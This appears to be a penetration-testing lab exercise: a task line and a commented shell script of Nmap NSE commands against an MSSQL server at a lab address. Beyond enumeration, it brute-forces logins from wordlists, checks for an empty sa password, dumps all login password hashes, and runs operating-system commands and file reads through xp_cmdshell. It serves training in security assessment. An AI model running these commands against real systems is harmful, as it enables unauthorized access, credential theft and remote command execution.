Run Nmap NSE scripts to enumerate the MSSQL service on the Windows target machine.
# MSSQL service enumeration with Nmap NSE scripts.
# Target, port, credentials and wordlist directory are factored into variables so
# every invocation reads the same way; the resulting command lines are unchanged.
# NOTE: credentials passed through --script-args show up in the process list and in
# shell history; nmap's --script-args-file can read them from a file instead.
target=10.10.10.50
port=1433
creds=mssql.username=admin,mssql.password=valid_password
wordlists=/root/Desktop/wordlist

# Version and instance information.
nmap -p"${port}" --script ms-sql-info "${target}"
# NTLM challenge details (host / domain names) from the TDS endpoint.
nmap -p"${port}" --script ms-sql-ntlm-info --script-args mssql.instance-port="${port}" "${target}"
# Login guessing from the user / password wordlists.
# This produces a burst of failed-login events on the target, so it is easy to spot in logs.
nmap -p"${port}" --script ms-sql-brute --script-args "userdb=${wordlists}/common_users.txt,passdb=${wordlists}/common_password.txt" "${target}"
# Does the sa account accept an empty password?
nmap -p"${port}" --script ms-sql-empty-password "${target}"
# List every login in master..syslogins; this is the only step written to output.txt (-oN).
nmap -p"${port}" --script ms-sql-query --script-args "${creds},ms-sql-query.query=SELECT * FROM master..syslogins" "${target}" -oN output.txt
# Dump the password hashes of all logins (treat the output as sensitive material).
nmap -p"${port}" --script ms-sql-dump-hashes --script-args "${creds}" "${target}"
# Run ipconfig through xp_cmdshell.
nmap -p"${port}" --script ms-sql-xp-cmdshell --script-args "${creds},ms-sql-xp-cmdshell.cmd=ipconfig" "${target}"
# Read a file through xp_cmdshell (the backslash is kept literally inside double quotes).
nmap -p"${port}" --script ms-sql-xp-cmdshell --script-args "${creds},ms-sql-xp-cmdshell.cmd=type c:\file_to_read_from" "${target}"